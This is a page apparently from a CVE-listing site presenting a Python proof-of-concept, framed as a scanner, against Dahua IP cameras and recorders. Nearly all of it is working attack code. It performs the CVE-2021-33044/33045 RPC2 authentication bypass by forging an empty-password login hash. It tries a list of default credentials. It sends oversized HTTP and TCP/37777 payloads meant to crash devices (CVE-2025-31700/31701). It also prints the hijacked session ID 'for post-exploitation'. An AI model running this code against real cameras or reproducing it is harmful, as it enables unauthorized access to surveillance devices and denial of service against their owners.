5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dahua_exploit.py PY
#!/usr/bin/env python3
"""
Dahua IP Camera - Multi-CVE Scanner & PoC

CVE-2021-33044, CVE-2021-33045, CVE-2025-31700, CVE-2025-31701

Sources: NVD, Dahua Security Advisory DSA-2021-001 / DSA-2025-001
         https://nvd.nist.gov/vuln/detail/CVE-2021-33044
         https://nvd.nist.gov/vuln/detail/CVE-2025-31700

CVE-2021-33044  CVSS 9.8 CRITICAL  CWE-287 (Improper Authentication)
  Auth bypass during RPC2 login via malicious data packet.
  Affects: IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
  Firmware < 2.820.x.210705 (IPC) / < 2.630.x.210707 (TPC)

CVE-2021-33045  CVSS 9.8 CRITICAL  CWE-287
  Same bypass. Widens scope to NVR-1/2/4/5/6xx & XVR-4x/5x/7x series
  Firmware < 4.001.x.210709

CVE-2025-31700  CVSS 8.1 HIGH  CWE-120 (Buffer Overflow)
  Buffer overflow via specially crafted malicious packet.
  DoS (crash) guaranteed; RCE possible on devices without ASLR.
  Advisory: https://dahuasecurity.com/aboutUs/trustedCenter/details/775

CVE-2025-31701  CVSS 8.1 HIGH  CWE-120 (Buffer Overflow)
  Same buffer overflow, different device set.
  Published: 2025-07-23 (no public PoC yet - DoS test included)
"""

import requests
import hashlib
import socket
import struct
import sys
import argparse

# Silence urllib3 warnings for the whole process; the HTTP calls in this file
# are all issued with verify=False.
requests.packages.urllib3.disable_warnings()

# ---------------------------------------------------------------------------
# Shared helpers
# ---------------------------------------------------------------------------

def rpc2_challenge(target, port, timeout=8, http=None):
    """
    Request a login challenge from the device's RPC2_Login endpoint.

    Posts a ``global.login`` call for user ``admin`` with an empty password
    and session 0, then reads the challenge fields out of the JSON reply.

    Args:
        target: Host name or IP address of the device.
        port: HTTP port to connect to.
        timeout: Per-request timeout in seconds.
        http: Optional object exposing ``post`` (e.g. a ``requests.Session``);
            the ``requests`` module itself is used when omitted or falsy.

    Returns:
        ``(realm, random, session)``. Fields missing from the reply default
        to ``""``, ``""`` and ``0``. Any exception yields ``(None, None, 0)``.
    """
    login_params = {
        "userName": "admin",
        "password": "",
        "clientType": "Web3.0",
        "loginType": "Direct",
        "authorityType": "Default",
        "passwordType": "Default",
    }
    envelope = {
        "method": "global.login",
        "params": login_params,
        "id": 1,
        "session": 0,
    }
    try:
        client = http or requests
        reply = client.post(
            f"http://{target}:{port}/RPC2_Login",
            json=envelope,
            timeout=timeout,
            verify=False,
        )
        body = reply.json()
        challenge = body.get("params", {})
        realm = challenge.get("realm", "")
        nonce = challenge.get("random", "")
        session = body.get("session", 0)
    except Exception:
        # Best-effort probe: any failure is reported as "no challenge".
        return None, None, 0
    return realm, nonce, session


def rpc2_login(target, port, user, pw_hash, session=0, timeout=8, http=None):
    """
    Post a ``global.login`` request carrying a precomputed password hash.

    Args:
        target: Host name or IP address of the device.
        port: HTTP port to connect to.
        user: Value sent as ``userName``.
        pw_hash: Value sent as ``password``.
        session: Session identifier placed in the request envelope.
        timeout: Per-request timeout in seconds.
        http: Optional object exposing ``post`` (e.g. a ``requests.Session``);
            the ``requests`` module itself is used when omitted or falsy.

    Returns:
        The decoded JSON reply. If anything raises, ``{"error": "<message>"}``
        where the message is ``str()`` of the exception.
    """
    envelope = {
        "method": "global.login",
        "params": {
            "userName": user,
            "password": pw_hash,
            "clientType": "Web3.0",
            "loginType": "Direct",
            "authorityType": "Default",
            "passwordType": "Default",
        },
        "id": 2,
        "session": session,
    }
    try:
        client = http or requests
        endpoint = f"http://{target}:{port}/RPC2_Login"
        reply = client.post(endpoint, json=envelope, timeout=timeout, verify=False)
        decoded = reply.json()
    except Exception as exc:
        # Note: here "error" is a plain string, not a dict as in device replies.
        return {"error": str(exc)}
    return decoded


def bypass_hash(user, realm, random_str):
    """
    Build the login hash for an empty password.

    Computes ``H1 = MD5("<user>:<realm>:")`` and returns
    ``MD5("<H1>:<random_str>:<H1>")``; both digests are upper-case hex.
    """
    def _md5_upper(text):
        return hashlib.md5(text.encode()).hexdigest().upper()

    inner = _md5_upper("{}:{}:".format(user, realm))
    return _md5_upper("{0}:{1}:{0}".format(inner, random_str))


def legit_hash(user, pw, realm, random_str):
    """
    Build the login hash for a known password.

    Computes ``H1 = MD5("<user>:<realm>:<pw>")`` and returns
    ``MD5("<H1>:<random_str>:<H1>")``; both digests are upper-case hex.
    """
    def _md5_upper(text):
        return hashlib.md5(text.encode()).hexdigest().upper()

    inner = _md5_upper("{}:{}:{}".format(user, realm, pw))
    return _md5_upper("{0}:{1}:{0}".format(inner, random_str))


# ---------------------------------------------------------------------------
# CVE-2021-33044 / CVE-2021-33045 -- Authentication Bypass (CVSS 9.8)
# ---------------------------------------------------------------------------

def test_auth_bypass(target, port=80, timeout=8):
    """
    Attempt the empty-password RPC2 login (CVE-2021-33044/45 check).

    Fetches a challenge with ``rpc2_challenge``, submits the hash produced by
    ``bypass_hash`` for user ``admin`` and reports the outcome on stdout.

    Args:
        target: Host name or IP address of the device.
        port: HTTP port (default 80).
        timeout: Per-request timeout in seconds.

    Returns:
        ``(True, session_id)`` when the reply's ``result`` is ``True``;
        ``(False, None)`` otherwise, including when the endpoint is
        unreachable or the login request itself fails.
    """
    print("[*] CVE-2021-33044/45 -- RPC2 auth bypass")

    # The context manager releases the session's pooled connections on every
    # exit path, including the early return below.
    with requests.Session() as http:
        http.verify = False
        realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
        if not realm:
            print("    [-] RPC2_Login not reachable")
            return False, None

        print(f"    [+] Realm: '{realm}'  Random: '{rnd}'  Session: {sess}")
        bh = bypass_hash("admin", realm, rnd)
        resp = rpc2_login(target, port, "admin", bh, sess, timeout, http=http)

    if not isinstance(resp, dict):
        # The endpoint answered with JSON that is not an object.
        print(f"    [-] Unexpected login response: {resp!r}")
        return False, None

    if resp.get("result") is True:
        sid = resp.get("session", "")
        print(f"    [!!!] VULNERABLE -- session: {sid}")
        return True, sid

    err = resp.get("error", {})
    if isinstance(err, dict):
        print(f"    [-] Not vulnerable (patched) -- {err.get('code')}: {err.get('message')}")
    else:
        # rpc2_login reports transport failures as {"error": "<text>"}; a plain
        # string has no .get(), so it is printed as-is instead of crashing.
        print(f"    [-] Login request failed -- {err}")
    return False, None


def test_default_creds(target, port=80, timeout=8):
    """
    Try a fixed list of default user/password pairs against RPC2_Login.

    A single challenge is fetched with ``rpc2_challenge`` and reused for every
    attempt; each pair is hashed with ``legit_hash`` and sent via
    ``rpc2_login``. Progress is printed to stdout.

    Args:
        target: Host name or IP address of the device.
        port: HTTP port (default 80).
        timeout: Per-request timeout in seconds.

    Returns:
        ``(user, password, session)`` for the first pair whose reply has
        ``result`` equal to ``True``; ``None`` when the endpoint is
        unreachable or no pair is accepted.
    """
    candidates = (
        ("admin", ""), ("admin", "admin"), ("admin", "888888"),
        ("admin", "666666"), ("admin", "123456"),
        ("666666", "666666"), ("888888", "888888"),
    )

    print("[*] Default credential check")

    # The context manager releases the session's pooled connections on every
    # exit path, including the early returns below.
    with requests.Session() as http:
        http.verify = False
        realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
        if not realm:
            print("    [-] RPC2_Login not reachable")
            return None

        for user, pw in candidates:
            resp = rpc2_login(target, port, user,
                              legit_hash(user, pw, realm, rnd),
                              sess, timeout, http=http)
            # A JSON reply that is not an object cannot signal success.
            if isinstance(resp, dict) and resp.get("result") is True:
                print(f"    [+] Valid: {user}:{pw!r}")
                return user, pw, resp.get("session")

    print("    [-] No default credentials matched")
    return None


# ---------------------------------------------------------------------------
# CVE-2025-31700 / CVE-2025-31701 -- Buffer Overflow DoS (CVSS 8.1)
# ---------------------------------------------------------------------------

def _send_overflow_http(target, port, timeout=8):
    """
    POST a ``global.login`` request with 8192-character field values.

    ``userName``, ``password`` and ``clientType`` all carry the same
    over-length string.

    Returns:
        ``(status_code, body_length)`` when a response arrives. On failure the
        first element is ``"CONNECTION_RESET"`` (requests ``ConnectionError``),
        ``"TIMEOUT"`` (requests ``Timeout``) or the exception text, and the
        second element is ``0``.
    """
    filler = "A" * 8192   # well beyond any sane field limit

    params = dict.fromkeys(("userName", "password", "clientType"), filler)
    params.update(authorityType="Default", passwordType="Default")
    request_body = {"method": "global.login", "params": params, "id": 1}
    endpoint = f"http://{target}:{port}/RPC2_Login"

    try:
        reply = requests.post(endpoint, json=request_body,
                              timeout=timeout, verify=False)
        return reply.status_code, len(reply.content)
    # ConnectionError is checked before Timeout, so an exception that is both
    # is reported as CONNECTION_RESET.
    except requests.exceptions.ConnectionError:
        return "CONNECTION_RESET", 0
    except requests.exceptions.Timeout:
        return "TIMEOUT", 0
    except Exception as exc:
        return str(exc), 0


def _send_overflow_tcp(target, tcp_port=37777, timeout=8):
    """
    Send one over-length frame to the device's raw TCP port and wait for a reply.

    The frame is an 8-byte big-endian header (the constant ``0xFF010000``
    followed by the body length) and a 65535-byte body of ``b"A"``.

    Args:
        target: Host name or IPv4 address of the device.
        tcp_port: TCP port to connect to (default 37777).
        timeout: Socket timeout in seconds for connect, send and receive.

    Returns:
        ``("RESPONDED", n)`` when ``n`` bytes are received (``n`` is 0 if the
        peer closed the connection), ``("TIMEOUT_AFTER_SEND", 0)`` when the
        receive times out, ``("PORT_CLOSED", 0)`` when the connection is
        refused, otherwise ``(str(exception), 0)``.
    """
    body = b"A" * 65535
    frame = struct.pack(">II", 0xFF010000, len(body)) + body

    try:
        # The context manager closes the socket on every path, including
        # failures in connect()/sendall() that previously leaked it.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((target, tcp_port))
            s.sendall(frame)
            try:
                resp = s.recv(1024)
            except socket.timeout:
                return "TIMEOUT_AFTER_SEND", 0
            return "RESPONDED", len(resp)
    except ConnectionRefusedError:
        return "PORT_CLOSED", 0
    except Exception as e:
        return str(e), 0


def test_buffer_overflow(target, port=80, timeout=8):
    """
    CVE-2025-31700 / CVE-2025-31701 -- over-length input probe.

    Runs the HTTP probe (``_send_overflow_http``) and the TCP/37777 probe
    (``_send_overflow_tcp``) and prints both outcomes.

    The HTTP result is flagged when the status is ``"CONNECTION_RESET"``,
    ``"TIMEOUT"`` or an integer >= 500. The TCP result is flagged when the
    status is ``"TIMEOUT_AFTER_SEND"`` or contains "reset" (case-insensitive).

    WARNING: This test may cause the device to crash (DoS).

    Returns:
        ``True`` if either probe was flagged, else ``False``.
    """
    print("[*] CVE-2025-31700/01 -- Buffer overflow DoS probe")
    print("    [!] WARNING: may crash the target device")

    # --- HTTP probe ---
    http_status, http_len = _send_overflow_http(target, port, timeout)
    print(f"    HTTP response  : status={http_status}  len={http_len}")
    if http_status in ("CONNECTION_RESET", "TIMEOUT"):
        http_flagged = True
    else:
        http_flagged = isinstance(http_status, int) and http_status >= 500

    # --- TCP probe on port 37777 (Dahua binary protocol) ---
    tcp_status, tcp_len = _send_overflow_tcp(target, 37777, timeout)
    print(f"    TCP/37777      : {tcp_status}  len={tcp_len}")
    if tcp_status in ("TIMEOUT_AFTER_SEND",):
        tcp_flagged = True
    else:
        tcp_flagged = isinstance(tcp_status, str) and "reset" in tcp_status.lower()

    if not (http_flagged or tcp_flagged):
        print("    [-] No obvious crash response (may still be vulnerable -- check manually)")
        return False

    print("    [!!!] Possible DoS -- device may have crashed (CVE-2025-31700/01)")
    return True


# ---------------------------------------------------------------------------
# Main runner
# ---------------------------------------------------------------------------

# Dispatch table for the --cve option: CVE id -> callable(target, port, timeout).
# Every callable returns a 2-tuple; the overflow entries pad theirs with None.
# Key order is significant because it becomes the argparse ``choices`` list.
CVE_MAP = {
    **dict.fromkeys(
        ("2021-33044", "2021-33045"),
        lambda t, p, to: test_auth_bypass(t, p, to),
    ),
    **dict.fromkeys(
        ("2025-31700", "2025-31701"),
        lambda t, p, to: (test_buffer_overflow(t, p, to), None),
    ),
}


def run_all(target, port, timeout):
    """
    Run every check against one target and print a summary.

    Order: auth-bypass check, default-credential check, overflow probe.
    All output goes to stdout; nothing is returned.

    Args:
        target: Host name or IP address of the device.
        port: HTTP port.
        timeout: Per-request timeout in seconds.
    """
    banner = f"""
==================================================
  Dahua Multi-CVE Scanner
  CVE-2021-33044/45 | CVE-2025-31700/01
==================================================
Target : {target}:{port}
"""
    print(banner)

    bypass_ok, session = test_auth_bypass(target, port, timeout)
    print()
    default_ok = test_default_creds(target, port, timeout)
    print()
    bof_ok = test_buffer_overflow(target, port, timeout)

    if bypass_ok:
        bypass_label = 'VULNERABLE'
    else:
        bypass_label = 'Not Vulnerable (patched or unreachable)'
    creds_label = 'FOUND' if default_ok else 'None matched'
    bof_label = 'POSSIBLE' if bof_ok else 'No crash observed'

    rule = "=" * 50
    print("\n" + rule)
    print("SUMMARY")
    print(rule)
    print(f"  CVE-2021-33044/45 auth bypass : {bypass_label}")
    print(f"  Default credentials           : {creds_label}")
    print(f"  CVE-2025-31700/01 buffer ovfl : {bof_label}")

    # The session hint is shown only when the bypass succeeded and returned
    # a non-empty session value.
    if not (bypass_ok and session):
        return
    print(f"\n  [!!!] Session ID for post-exploitation: {session}")
    print("  Use dahua_auth_bypass.py --dump to enumerate device info.")

def main():
    """
    Command-line entry point.

    Parses ``target``, ``-p/--port``, ``-c/--cve`` and ``--timeout``. With
    ``--cve`` only the matching ``CVE_MAP`` entry is run; otherwise
    ``run_all`` executes every check.
    """
    usage_notes = """
CVEs covered:
  2021-33044 / 2021-33045  -- RPC2 auth bypass     (CVSS 9.8)
  2025-31700 / 2025-31701  -- Buffer overflow DoS   (CVSS 8.1)

Examples:
  python dahua_exploit.py 192.168.1.100
  python dahua_exploit.py 192.168.1.100 -p 8080
  python dahua_exploit.py 192.168.1.100 -c 2021-33044
        """

    cli = argparse.ArgumentParser(
        description="Dahua Multi-CVE Scanner",
        # Raw formatter keeps the epilog's line breaks as written.
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_notes,
    )
    cli.add_argument("target", help="Camera IP or hostname")
    cli.add_argument("-p", "--port", type=int, default=80,
                     help="HTTP port (default: 80)")
    cli.add_argument("-c", "--cve", choices=list(CVE_MAP),
                     help="Test a single CVE only")
    cli.add_argument("--timeout", type=int, default=8)
    opts = cli.parse_args()

    if not opts.cve:
        run_all(opts.target, opts.port, opts.timeout)
        return

    selected_check = CVE_MAP[opts.cve]
    selected_check(opts.target, opts.port, opts.timeout)


# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()